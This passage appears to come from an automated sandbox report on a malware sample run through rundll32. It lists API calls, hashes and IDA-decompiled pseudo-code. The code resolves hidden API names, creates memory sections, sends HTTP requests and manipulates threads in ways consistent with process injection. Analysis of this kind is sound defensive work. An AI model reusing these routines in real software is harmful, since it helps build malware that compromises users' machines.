                                            • Part of subcall function 0489403D: lstrlen.KERNEL32(00000000,00000000,00000000,7477C740,?,?,?,04893752,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 048940A4
                                            • Part of subcall function 0489403D: sprintf.NTDLL ref: 048940C5
                                          • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 04893764
                                          • lstrlen.KERNEL32(?,?,?,0489653D,?,052495B0), ref: 0489376C
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • strcpy.NTDLL ref: 04893783
                                          • lstrcat.KERNEL32(00000000,?), ref: 0489378E
                                            • Part of subcall function 0489723B: lstrlen.KERNEL32(?,?,?,00000000,?,0489379D,00000000,?,?,?,0489653D,?,052495B0), ref: 0489724C
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0489653D,?,052495B0), ref: 048937AB
                                            • Part of subcall function 048920D2: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,048937B7,00000000,?,?,0489653D,?,052495B0), ref: 048920DC
                                            • Part of subcall function 048920D2: _snprintf.NTDLL ref: 0489213A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 8af1b900f7b55b215bb0a9b94aaf0024eb76312e658f4f0aca1fbdc8b3e65e25
                                          • Instruction ID: 8518470b3e4b9f7b0886734ee1bef3f0fda9c83ff6225a52bf1f6718cd097c0c
                                          • Opcode Fuzzy Hash: 8af1b900f7b55b215bb0a9b94aaf0024eb76312e658f4f0aca1fbdc8b3e65e25
                                          • Instruction Fuzzy Hash: B211E773905D247B5F127BBC9C84CAE36DC9E88A5831D0B15F905D7200DFB4ED0287A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 04891162: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052489D8,04893C2E,?,?,?,?,?,?,?,?,?,?,?,04893C2E), ref: 0489122F
                                            • Part of subcall function 04896615: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04896652
                                            • Part of subcall function 04896615: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04896683
                                          • SysAllocString.OLEAUT32(00000000), ref: 04893C5A
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04893C6E
                                          • SysAllocString.OLEAUT32(00000000), ref: 04893C80
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893CE8
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893CF7
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893D02
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                          • String ID:
                                          • API String ID: 2831207796-0
                                          • Opcode ID: 6ae70014a010be8343d2591d267cd67db5674698306ace83251e85f9ac204cd9
                                          • Instruction ID: c75e8510fdcf5f39f50e12cebb103d05f19c669b5c2b01fa3906dbe62bd24d1f
                                          • Opcode Fuzzy Hash: 6ae70014a010be8343d2591d267cd67db5674698306ace83251e85f9ac204cd9
                                          • Instruction Fuzzy Hash: 5A414F36900A09AFDF01EFBCD844AAEB7BAEF49304F184925ED10EB210DA71AD05CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B5F6FB
                                            • Part of subcall function 00B54345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B54366
                                            • Part of subcall function 00B54345: GetProcAddress.KERNEL32(00000000,?), ref: 00B5437F
                                            • Part of subcall function 00B54345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?), ref: 00B5439C
                                            • Part of subcall function 00B54345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000), ref: 00B543AD
                                            • Part of subcall function 00B54345: FindCloseChangeNotification.KERNEL32(?,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B543C0
                                          • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76D84EE0,00000000), ref: 00B5F7B5
                                          • WaitForSingleObject.KERNEL32(00000064), ref: 00B5F7C3
                                          • SuspendThread.KERNEL32(?), ref: 00B5F7D6
                                            • Part of subcall function 00B5CF88: memset.NTDLL ref: 00B5D252
                                          • ResumeThread.KERNEL32(?), ref: 00B5F859
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                          • String ID:
                                          • API String ID: 2397206891-0
                                          • Opcode ID: e2701b4228f73181b4d687d0641655a61036192d77afb416e0cace8610da1456
                                          • Instruction ID: f6e042c51dcd768b9efe58927695564e4fa06f76f5c39e9f1fe2eef5797bbc05
                                          • Opcode Fuzzy Hash: e2701b4228f73181b4d687d0641655a61036192d77afb416e0cace8610da1456
                                          • Instruction Fuzzy Hash: 6A418B7290020AEBDB21AF64CC85BAEBBEAEB04306F1444F5FD15A7150DB34DE998B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,?,?,00000000,00B750B8,00000018,00B5309A,00000000,?,?,?,?,00000000), ref: 00B6FB35
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000004,00000000,?,00000000,?,?,?,00000000,00B750B8,00000018,00B5309A), ref: 00B6FBC0
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B6FBE9
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B6FC07
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                          • String ID:
                                          • API String ID: 3666628472-0
                                          • Opcode ID: 5d5167ac54b73a141b235a1be04a860275826662836e0138ef4f0ecae639a0f0
                                          • Instruction ID: ffe3811a98b6a28c8c918b0715dc4e8cb49cabc9080519fb68f327378fa0911d
                                          • Opcode Fuzzy Hash: 5d5167ac54b73a141b235a1be04a860275826662836e0138ef4f0ecae639a0f0
                                          • Instruction Fuzzy Hash: F8417DB190070AEFCB11DF65D885AADBBF5FF48300B1085A9E919E7220D7749A91CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E048974E0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E04894DF6(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x489a348; // 0x9ad5a8
                                          					_t1 = _t23 + 0x489b11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x489a348; // 0x9ad5a8
                                          					_t2 = _t26 + 0x489b769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E04894C73(_t54);
                                          					} else {
                                          						_t30 =  *0x489a348; // 0x9ad5a8
                                          						_t5 = _t30 + 0x489b756; // 0x614d775a
                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x489a348; // 0x9ad5a8
                                          							_t7 = _t33 + 0x489b40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x489a348; // 0x9ad5a8
                                          								_t9 = _t36 + 0x489b4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x489a348; // 0x9ad5a8
                                          									_t11 = _t39 + 0x489b779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E048925D7(_t54, _a8); // executed
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}

                                          APIs
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,048923A0,?,?,?,?,00000000,00000000), ref: 04897505
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04897527
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0489753D
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04897553
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04897569
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0489757F
                                            • Part of subcall function 048925D7: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000,0489759F), ref: 04892634
                                            • Part of subcall function 048925D7: memset.NTDLL ref: 04892656
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 3012371009-0
                                          • Opcode ID: bbff08814d4c293cd1bd711c0c1be9c3273a92f7b13f4e523a3c7610a4680479
                                          • Instruction ID: a312c11f5b759ccc5ab40910ae695609624c2e3a2da0aac52339affbe654010e
                                          • Opcode Fuzzy Hash: bbff08814d4c293cd1bd711c0c1be9c3273a92f7b13f4e523a3c7610a4680479
                                          • Instruction Fuzzy Hash: 242128B1610B0AEFDB90EF69D884E6AB7FCFF446447084A29E515C7211EB74FD048B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,00B5D0A2,?,?,?,00000000,00000000), ref: 00B646ED
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6470F
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B64725
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6473B
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B64751
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B64767
                                            • Part of subcall function 00B5DDDD: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000), ref: 00B5DE3A
                                            • Part of subcall function 00B5DDDD: memset.NTDLL ref: 00B5DE5E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 3012371009-0
                                          • Opcode ID: bc20caba8a6e23c0d559e959e99ba2bc74906233a2ea893971b6b738a659b82b
                                          • Instruction ID: 2c7a1607821087e02d046644693716307b0a1f3b230f1219970f57719f817cb8
                                          • Opcode Fuzzy Hash: bc20caba8a6e23c0d559e959e99ba2bc74906233a2ea893971b6b738a659b82b
                                          • Instruction Fuzzy Hash: E2212AB550060AAFDB10DF69DC84E6AB7ECEF0531570144AAE909DB211EB74ED44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04894BD6(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0) {
                                          					_t9 = E04895296(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                                          					if(_t9 == 0) {
                                          						L9:
                                          						return GetLastError();
                                          					}
                                          				}
                                          				_t10 = E04897A71(_t9, _t18, _t22, _a8); // executed
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04895388,?,?,00000000,00000000), ref: 04894C10
                                          • ResetEvent.KERNEL32(?), ref: 04894C15
                                          • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04894C22
                                          • GetLastError.KERNEL32 ref: 04894C2D
                                          • GetLastError.KERNEL32(?,?,00000102,04895388,?,?,00000000,00000000), ref: 04894C48
                                            • Part of subcall function 04895296: lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,04894BF5,?,?,?,?,00000102,04895388,?,?,00000000), ref: 048952A2
                                            • Part of subcall function 04895296: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04894BF5,?,?,?,?,00000102,04895388,?), ref: 04895300
                                            • Part of subcall function 04895296: lstrcpy.KERNEL32(00000000,00000000), ref: 04895310
                                          • SetEvent.KERNEL32(?), ref: 04894C3B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3739416942-0
                                          • Opcode ID: 68b698739c940edb121c207a479702ee9a6a6811969894fb2913319620894692
                                          • Instruction ID: daf709cf90d828f4d116b1a0e3c9079292a117fd039866dd6ff245e10a5feccb
                                          • Opcode Fuzzy Hash: 68b698739c940edb121c207a479702ee9a6a6811969894fb2913319620894692
                                          • Instruction Fuzzy Hash: F4018F31108A00AEDF306A65DE44F1B76E4EF84B69F180F24E452D21E0DA31FC059621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00B5A82F), ref: 00B66B4B
                                          • QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B60
                                          • GetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B6B
                                          • TerminateThread.KERNEL32(00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B75
                                          • CloseHandle.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B7C
                                          • SetLastError.KERNEL32(00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B66B85
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                          • String ID:
                                          • API String ID: 3832013932-0
                                          • Opcode ID: f1a7baeb5bfe500326f62f25f2f867a378d4a8582c1fd74dedff25f76a991054
                                          • Instruction ID: b4050b767a50011b02de3f9bc8c260b0e256a7bec0d0dca8b284f3ba13c8ef31
                                          • Opcode Fuzzy Hash: f1a7baeb5bfe500326f62f25f2f867a378d4a8582c1fd74dedff25f76a991054
                                          • Instruction Fuzzy Hash: C2F01C32205221FFD7226BA0AC08F5BBF69FF59763F454508F60AE3560DF258990CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E04896E20(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				char _v284;
                                          				void* __esi;
                                          				char* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t62;
                                          				intOrPtr _t64;
                                          				char _t65;
                                          				void* _t67;
                                          				intOrPtr _t68;
                                          				intOrPtr _t69;
                                          				intOrPtr _t71;
                                          				void* _t73;
                                          				signed int _t81;
                                          				void* _t91;
                                          				void* _t92;
                                          				char _t98;
                                          				signed int* _t100;
                                          				intOrPtr* _t101;
                                          				void* _t102;
                                          
                                          				_t92 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t98 = _a16;
                                          				if(_t98 == 0) {
                                          					__imp__( &_v284,  *0x489a3dc);
                                          					_t91 = 0x80000002;
                                          					L6:
                                          					_t59 = E04894208( &_v284,  &_v284);
                                          					_a8 = _t59;
                                          					if(_t59 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t60 = _a20;
                                          						if(_t60 != 0) {
                                          							 *_t60 =  *_t60 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t101 = _a24;
                                          					_t62 = E04893DCA(_t92, _t97, _t101, _t91, _t59); // executed
                                          					if(_t62 != 0) {
                                          						L27:
                                          						E04894C73(_a8);
                                          						goto L29;
                                          					}
                                          					_t64 =  *0x489a318; // 0x5249da0
                                          					_t16 = _t64 + 0xc; // 0x5249ec2
                                          					_t65 = E04894208(_t64,  *_t16);
                                          					_a24 = _t65;
                                          					if(_t65 == 0) {
                                          						L14:
                                          						_t29 = _t101 + 0x14; // 0x102
                                          						_t33 = _t101 + 0x10; // 0x3d048990, executed
                                          						_t67 = E04894C88(_t97,  *_t33, _t91, _a8,  *0x489a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                          						if(_t67 == 0) {
                                          							_t68 =  *0x489a348; // 0x9ad5a8
                                          							if(_t98 == 0) {
                                          								_t35 = _t68 + 0x489ba3f; // 0x4d4c4b48
                                          								_t69 = _t35;
                                          							} else {
                                          								_t34 = _t68 + 0x489b8e7; // 0x55434b48
                                          								_t69 = _t34;
                                          							}
                                          							if(E048926E7(_t69,  *0x489a3d4,  *0x489a3d8,  &_a24,  &_a16) == 0) {
                                          								if(_t98 == 0) {
                                          									_t71 =  *0x489a348; // 0x9ad5a8
                                          									_t44 = _t71 + 0x489b846; // 0x74666f53
                                          									_t73 = E04894208(_t44, _t44);
                                          									_t99 = _t73;
                                          									if(_t73 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t101 + 0x10; // 0x3d048990
                                          										E04893B76( *_t47, _t91, _a8,  *0x489a3d8, _a24);
                                          										_t49 = _t101 + 0x10; // 0x3d048990
                                          										E04893B76( *_t49, _t91, _t99,  *0x489a3d0, _a16);
                                          										E04894C73(_t99);
                                          									}
                                          								} else {
                                          									_t40 = _t101 + 0x10; // 0x3d048990, executed
                                          									E04893B76( *_t40, _t91, _a8,  *0x489a3d8, _a24); // executed
                                          									_t43 = _t101 + 0x10; // 0x3d048990
                                          									E04893B76( *_t43, _t91, _a8,  *0x489a3d0, _a16);
                                          								}
                                          								if( *_t101 != 0) {
                                          									E04894C73(_a24);
                                          								} else {
                                          									 *_t101 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t101 + 0x10; // 0x3d048990, executed
                                          					_t81 = E04894E0B( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                          					if(_t81 == 0) {
                                          						_t100 = _v16;
                                          						if(_v12 == 0x28) {
                                          							 *_t100 =  *_t100 & _t81;
                                          							_t26 = _t101 + 0x10; // 0x3d048990
                                          							E04894C88(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                          						}
                                          						E04894C73(_t100);
                                          						_t98 = _a16;
                                          					}
                                          					E04894C73(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					_t97 = _a8;
                                          					E0489799E(_t98, _a8,  &_v284);
                                          					__imp__(_t102 + _t98 - 0x117,  *0x489a3dc);
                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                          					_t91 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}
                                          0x04896e20
                                          0x04896e29
                                          0x04896e30
                                          0x04896e35
                                          0x04896ea2
                                          0x04896ea8
                                          0x04896ead
                                          0x04896eb4
                                          0x04896eb9
                                          0x04896ebe
                                          0x04897029
                                          0x04897030
                                          0x04897030
                                          0x04897035
                                          0x04897037
                                          0x04897037
                                          0x04897040
                                          0x04897040
                                          0x04896ec4
                                          0x04896ec9
                                          0x04896ed0
                                          0x0489701f
                                          0x04897022
                                          0x00000000
                                          0x04897022
                                          0x04896ed6
                                          0x04896edb
                                          0x04896ede
                                          0x04896ee3
                                          0x04896ee8
                                          0x04896f31
                                          0x04896f31
                                          0x04896f44
                                          0x04896f47
                                          0x04896f4e
                                          0x04896f54
                                          0x04896f5b
                                          0x04896f65
                                          0x04896f65
                                          0x04896f5d
                                          0x04896f5d
                                          0x04896f5d
                                          0x04896f5d
                                          0x04896f87
                                          0x04896f8f
                                          0x04896fbd
                                          0x04896fc2
                                          0x04896fc9
                                          0x04896fce
                                          0x04896fd2
                                          0x04897004
                                          0x04896fd4
                                          0x04896fe1
                                          0x04896fe4
                                          0x04896ff4
                                          0x04896ff7
                                          0x04896ffd
                                          0x04896ffd
                                          0x04896f91
                                          0x04896f9e
                                          0x04896fa1
                                          0x04896fb3
                                          0x04896fb6
                                          0x04896fb6
                                          0x0489700e
                                          0x0489701a
                                          0x04897010
                                          0x04897013
                                          0x04897013
                                          0x0489700e
                                          0x04896f87
                                          0x00000000
                                          0x04896f4e
                                          0x04896ef7
                                          0x04896efa
                                          0x04896f01
                                          0x04896f07
                                          0x04896f0a
                                          0x04896f0c
                                          0x04896f18
                                          0x04896f1b
                                          0x04896f1b
                                          0x04896f21
                                          0x04896f26
                                          0x04896f26
                                          0x04896f2c
                                          0x00000000
                                          0x04896f2c
                                          0x04896e3a
                                          0x00000000
                                          0x04896e61
                                          0x04896e61
                                          0x04896e6d
                                          0x04896e80
                                          0x04896e86
                                          0x04896e8e
                                          0x00000000
                                          0x04896e8e

                                          APIs
                                          • StrChrA.SHLWAPI(04892A82,0000005F,00000000,00000000,00000104), ref: 04896E53
                                          • lstrcpy.KERNEL32(?,?), ref: 04896E80
                                            • Part of subcall function 04894208: lstrlen.KERNEL32(?,00000000,05249DA0,00000000,04892263,05249FC3,69B25F44,?,?,?,?,69B25F44,00000005,0489A00C,4D283A53,?), ref: 0489420F
                                            • Part of subcall function 04894208: mbstowcs.NTDLL ref: 04894238
                                            • Part of subcall function 04894208: memset.NTDLL ref: 0489424A
                                            • Part of subcall function 04893B76: lstrlenW.KERNEL32(?,?,?,04896FE9,3D048990,80000002,04892A82,0489744C,74666F53,4D4C4B48,0489744C,?,3D048990,80000002,04892A82,?), ref: 04893B9B
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04896EA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                          • String ID: ($\
                                          • API String ID: 3924217599-1512714803
                                          • Opcode ID: 4fae8abd3f59ee2d726e3ded4ff55c13d2716f842c175fd0d662e2cae523c0b8
                                          • Instruction ID: d7dee9f4f067ad71a7063d4e5b115a38eed1cc41b730fc7dfcc3ceacb3857562
                                          • Opcode Fuzzy Hash: 4fae8abd3f59ee2d726e3ded4ff55c13d2716f842c175fd0d662e2cae523c0b8
                                          • Instruction Fuzzy Hash: 74514772510A09FFDF11AFA4DC40E9A3BF9EB08758F188E14F911A6120EB75ED21EB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 57%
                                          			E04892C52(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				void* _t49;
                                          				void* _t51;
